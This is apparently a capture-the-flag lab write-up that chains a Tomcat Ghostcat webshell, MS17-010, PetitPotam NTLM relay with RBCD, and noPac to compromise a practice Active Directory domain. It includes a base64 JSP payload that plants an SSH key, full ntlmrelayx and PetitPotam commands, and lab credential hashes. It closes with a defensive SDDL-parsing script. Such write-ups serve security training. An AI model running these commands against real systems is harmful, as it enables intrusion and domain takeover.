
Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Spoofing Writeup


0x01 – Info

Tags: Tomcat, NTLM, WebClient, coerced authentication, noPac

0x02 – Recon

Target external ip 47.92.146.66

Nmap results

Focus on port 8009 (AJP): that means Tomcat, matching the range's Tomcat tag. The directory scan's 404 page identifies it as Tomcat 9.0.30.

Playing with Ghostcat

Test with this project

https://github.com/00theway/Ghostcat-CNVD-2020-10487

Read /WEB-INF/web.xml

Save the url-pattern entries as a wordlist

ffuf with that wordlist

Look at UploadServlet

Upload temp.txt

The response returns the file path: ./upload/7dbbdee357b4472f5aad6b8ce83980dd/20221206093440839.txt

Replace ./upload with /upload and the uploaded file can be read through Ghostcat:

python3 ajpShooter.py http://47.92.146.66:8080 8009 /upload/7dbbdee357b4472f5aad6b8ce83980dd/20221206093440839.txt read


0x03 – GhostCat command execution

Prepare shell.txt. The JSP runs a base64-encoded script that appends our SSH public key to /root/.ssh/authorized_keys and sets its mode to 600, then prints the command output:

<% java.io.InputStream in=Runtime.getRuntime().exec("bash -c {echo,ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDL3NKaDY4Uk5hWktLakNQaE40WUxpSnJ4eDR3N3JtbDBGcFRmMTNYNHVKZlpFZm4yU25scE9rdXQ0OE1LdURHOEtDcXczRW0zNU9odXdUa2p3ZEkvRGhGN3ZSeTB0T2xtWDE5NmJHcXpndE5pM1YzUHExc3NCMzV5Ui85SHJ6ZjVEdHdqS2NKdkphV0RuZzU2UWhHZjlnR21vdUZVQWV2QjdsUWl3a01FNWNxTzVsQTRwUm5KVEh2RU1OQUkxQkc3MTBEeWNKT28rNGh1TGNNVjZhdUs3UXdKTWdnN0oyU2U5TEpGZWk2R2g0amJUSGRhdmNBVjV6VVJZeFI4QVNXSmNqY29tM2dMUEE1UWNxSzNzSERRVmswUHllaTR3cEJwWWlFUGlHcHlQR2Y1T3ErUU0xQmJyR0gvTlRBYnZWa3dDZnBkRURWdVBNNWhHOFY4c09HTjIxczlWazFjMVBXaEh2WDZ1ejhRaDRNdUdnQlRYSHlZb3duTjg3OTExVDVGR0VjVzlWeUh1cm9FSVJtdE9sY3dBYmRMc0k0NVhOS1o0aWoxdERLNTRTMmpXWXhJTjhSL1ZuUnV2RVVoTVpGOUlabDM3UW5EQnBFR25LTXFjTVE4cHVUZUJBMngvSURHMFR6MWxjVGk5WHp5WjVheTd4dTJwZStidXhWT1BSQ2M9IiA+PiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5cwoKY2htb2QgNjAwIC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCg==}|{base64,-d}|{bash,-i}").getInputStream(); int a=-1; byte[] b=new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b,0,a)); } out.print("</pre>");%>

Upload shell.txt, then execute the uploaded file through Ghostcat (ajpShooter's eval mode). SSH in with the key – flag01.

0x04 – Pivot host, Ubuntu: 172.22.11.76

SSH in. Nothing of note on the host itself, so just set up the proxy and scan port 445 through it, which turns up three hosts:

172.22.11.45 XR-Desktop.xiaorang.lab

172.22.11.6 xiaorang-dc.xiaorang.lab

172.22.11.26 XR-LCM3AE8B.xiaorang.lab

Note 172.22.11.45 – Windows 7 – MS17-010. MS17-010 lands in one shot, followed by the basic post-exploitation steps.

Credential list:

Administrator 4430c690b4c1ab3f4fe4f8ac0410de4a – (local credentials)

John 03cae082068e8d55ea307b75581a8859 – (local credentials)

XR-DESKTOP$ 3aa5c26b39a226ab2517d9c57ef07e3e – (domain credentials)

yangmei 25e42ef4cc0ab6a8ff9e3edbbda91841 – xrihGHgoNZQ (plaintext) – (domain credentials)

I tried spraying these credential combinations and got nothing, so I skip that demonstration here and go straight to the domain penetration part.

Flag2. Add the domain user yangmei to the local Administrators group on the machine. The domain controller is identified as 172.22.11.6 – xiaorang-dc. BloodHound collection.

0x05 – Domain penetration link, entrance XR-Desktop: 172.22.11.45

Let's go through this quickly (one-sentence summary: the DC cannot be taken directly).

The usernames collected by BloodHound were sprayed against the passwords/hashes obtained so far; no new users turned up. MAQ (ms-DS-MachineAccountQuota) is 0, so ordinary users cannot add computer accounts, and LDAP has no TLS, so computers cannot be added remotely that way either. impacket's addcomputer has two methods, SAMR and LDAPS: SAMR is blocked by MAQ=0, and LDAPS is blocked by MAQ=0 plus the missing TLS.

The DC is vulnerable to noPac, but the current user yangmei cannot exploit it: she has no ACL on the domain's Computers container that would let her create objects there. She also has no WriteDacl on the current machine XR-DESKTOP, so that machine account's sAMAccountName cannot be rewritten either. DFSCoerce and PetitPotam both work against the domain, but CVE-2019-1040 is not present, so DFSCoerce is dropped and PetitPotam gets priority (DFSCoerce only coerces SMB authentication, and relaying SMB to LDAP needs the MIC stripped, which is what CVE-2019-1040 allowed; PetitPotam can point the victim at a WebDAV listener, giving HTTP authentication that relays to LDAP cleanly).

noPac exploit: Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user (github.com)

PetitPotam scan. There is no ADCS, so the ADCS + PetitPotam + NTLM relay play is out.

Attack chain: use PetitPotam to coerce the target into authenticating to our HTTP relay. Because the target reaches the relay through the WebClient service, its NTLM authentication arrives over HTTP; ntlmrelayx relays it to LDAP on the DC, where it holds the identity of the target's machine account, and uses that identity to write msDS-AllowedToActOnBehalfOfOtherIdentity on the target's own computer object, granting our controlled machine account the right to impersonate users to the target (RBCD). Precondition: the target machine must have the WebClient service running.

WebClient scan: only 172.22.11.26 (XR-LCM3AE8B) has it running, so that is the only host that can be won this way.

Relay attack preamble: in a real engagement the relay only needs whatever occupies port 80 stopped and port forwarding enabled (portfwd; later Cobalt Strike versions added rportfwd_local, which forwards straight to the operator's client). This demonstration mimics that approach: instead of dropping impacket onto the Ubuntu pivot, the relay environment is built from port forwarding + proxy.

We need to forward the pivot's port 80 to port 80 on our local client. Note: sshd binds reverse forwards to 127.0.0.1 unless GatewayPorts is enabled on the server, so a trick is needed here.

As the figure shows, even when the reverse forward explicitly asks to listen on all interfaces (-R *:79:127.0.0.1:80), port 79 is still bound to 127.0.0.1 (the SOCKS5 proxy is opened in the same session).

Add a socat on the pivot that forwards 0.0.0.0:80 to 127.0.0.1:79; the reverse tunnel then carries it back to port 80 on the client, so the pivot effectively listens on 0.0.0.0:80.

Test: traffic arriving at 172.22.11.76:80 is forwarded straight to our local port 80.

Start ntlmrelayx locally. Note: as mentioned, there is no LDAPS, so you cannot add a computer account and then delegate to it; instead the existing machine account xr-desktop$, whose hash we already hold, is given delegate access:

sudo proxychains4 -q -f proxychains.conf ntlmrelayx.py -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access

Use PetitPotam to coerce XR-LCM3AE8B into authenticating to 172.22.11.76 (the Ubuntu pivot). ubuntu@80/pwn.txt is the WebDAV form host@port/path; the single-label name has to resolve on the target for the WebClient to send NTLM authentication automatically:

proxychains4 -q -f ~/HTB/Spoofing/proxychains.conf python3 PetitPotam.py -u yangmei -p 'xrihGHgoNZQ' -d xiaorang.lab ubuntu@80/pwn.txt XR-LCM3AE8B

The RBCD attack is complete; the next step is to request a service ticket for XR-LCM3AE8B directly. Request a CIFS ticket for XR-LCM3AE8B (S4U with the xr-desktop$ hash collected earlier, impersonating Administrator).

0x06 – Domain penetration link – NoPAC, entrance XR-LCM3AE8B: 172.22.11.26

psexec. flag03 is in C:\users\administrator\flag\flag03.txt (no screenshot here). Upload mimikatz with smbclient.py and obtain new credentials: zhanghui 1232126b24cdf8c9bd2f788a9d7c7ed1


Only zhanghui succeeds. zhanghui is a member of the MA_Admin group, and the MA_Admin group can create computer objects, but I didn't see that in BloodHound. AdFind.exe -b 'CN=Computers,DC=xiaorang,DC=lab' nTSecurityDescriptor -sddl+++

BloodHound cannot show it, mainly because CreateChild is not collected into the JSON. Back to noPac, this time with the create-child option.

0x07 – Domain penetration link – xiaorang-dc

Log in to the DC with the CIFS ticket obtained through noPac. flag04 is in C:\users\administrator\flag\flag04.txt (no screenshot here). Domain admin (the mimikatz dump is skipped): administrator 0fadb57f5ec71437d1b03eea2cda70b9


0x08 – Playing around

Trying to fix BloodHound.py not collecting CreateChild.

bloodhound/enumeration/acls.py already defines the relevant variables; they just need to be used.

Go to line 170 and add it: match CreateChild and emit the data.

Run bloodhound.py again and look at the container results: the relevant data is now there. RID 1132 = the MA_Admin group.
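The AdFind command in 0x06 dumps the container's nTSecurityDescriptor as SDDL, and this section patches BloodHound.py to collect the same right. The Python below is an added example, not part of the writeup and not BloodHound.py's code: it walks the DACL of an SDDL string and reports every trustee holding CreateChild (ADS_RIGHT_DS_CREATE_CHILD, 0x1) or GenericAll on the container, distinguishing ACEs that cover any child class from those scoped to the computer class, and ignoring inherit-only ACEs, which do not apply to the container itself. The sample SDDL is constructed: the domain SID is made up, and RID 1132 stands in for MA_Admin.

```python
import re

# Schema GUID of the 'computer' object class (schemaIDGUID of CN=Computer).
COMPUTER_CLASS_GUID = "bf967a86-0de6-11d0-a285-00aa003049e2"

# SDDL two-letter right codes -> access mask bits (MS-DTYP / ADS_RIGHTS_ENUM).
RIGHTS = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "RC": 0x00020000, "SD": 0x00010000, "WD": 0x00040000, "WO": 0x00080000,
    "CC": 0x00000001, "DC": 0x00000002, "LC": 0x00000004, "SW": 0x00000008,
    "RP": 0x00000010, "WP": 0x00000020, "DT": 0x00000040, "LO": 0x00000080,
    "CR": 0x00000100,
}
CREATE_CHILD = RIGHTS["CC"]
GENERIC_ALL = RIGHTS["GA"]


def parse_rights(token):
    """Rights field of an ACE: either a hex mask or a run of two-letter codes."""
    if token.lower().startswith("0x"):
        return int(token, 16)
    mask = 0
    for i in range(0, len(token), 2):
        code = token[i:i + 2]
        if code not in RIGHTS:
            raise ValueError("unknown right %r" % code)
        mask |= RIGHTS[code]
    return mask


def dacl_aces(sddl):
    """Yield (type, flags, rights, object_guid, inherit_guid, sid) per DACL ACE."""
    m = re.search(r"D:[A-Z]*((?:\([^()]*\))+)", sddl)
    if not m:
        return
    for body in re.findall(r"\(([^()]*)\)", m.group(1)):
        fields = body.split(";")
        if len(fields) < 6:
            raise ValueError("short ACE: %s" % body)
        yield tuple(fields[:6])


def find_computer_creators(sddl):
    """Trustees that can create computer objects in the container.
    Returns [(sid, scope)]: scope is 'any' when the ACE carries no object type
    (CreateChild for every class) and 'computer' when it names the computer class.
    Deny ACEs, other object classes and inherit-only ACEs are skipped."""
    creators = []
    for ace_type, flags, rights, obj_guid, _inh, sid in dacl_aces(sddl):
        if ace_type not in ("A", "OA"):
            continue
        flag_codes = {flags[i:i + 2] for i in range(0, len(flags), 2)}
        if "IO" in flag_codes:
            continue
        mask = parse_rights(rights)
        if not mask & (CREATE_CHILD | GENERIC_ALL):
            continue
        if obj_guid == "":
            creators.append((sid, "any"))
        elif obj_guid.lower() == COMPUTER_CLASS_GUID:
            creators.append((sid, "computer"))
    return creators


# Constructed sample of what an nTSecurityDescriptor dump of CN=Computers can look
# like. The domain SID is invented; RID 1132 stands in for the MA_Admin group.
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
    "(OA;;CC;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-21-1234567890-1234567890-1234567890-1132)"
    "(OA;;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;AO)"
    "(A;IO;CC;;;S-1-5-21-1234567890-1234567890-1234567890-1105)"
    "(A;;LC;;;AU)"
)

if __name__ == "__main__":
    for sid, scope in find_computer_creators(SAMPLE_SDDL):
        print("%s can create %s objects here" % (sid, scope))
```

An ACE whose object type is the user class (the AO entry above) grants nothing for noPac, and a CreateChild ACE marked inherit-only only matters for objects created beneath the container, so neither shows up; that is the distinction a collector has to make before drawing the edge.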

BloodHound graph, though the data is still messy.

Original link: https://www.anquanke.com/post/id/285771
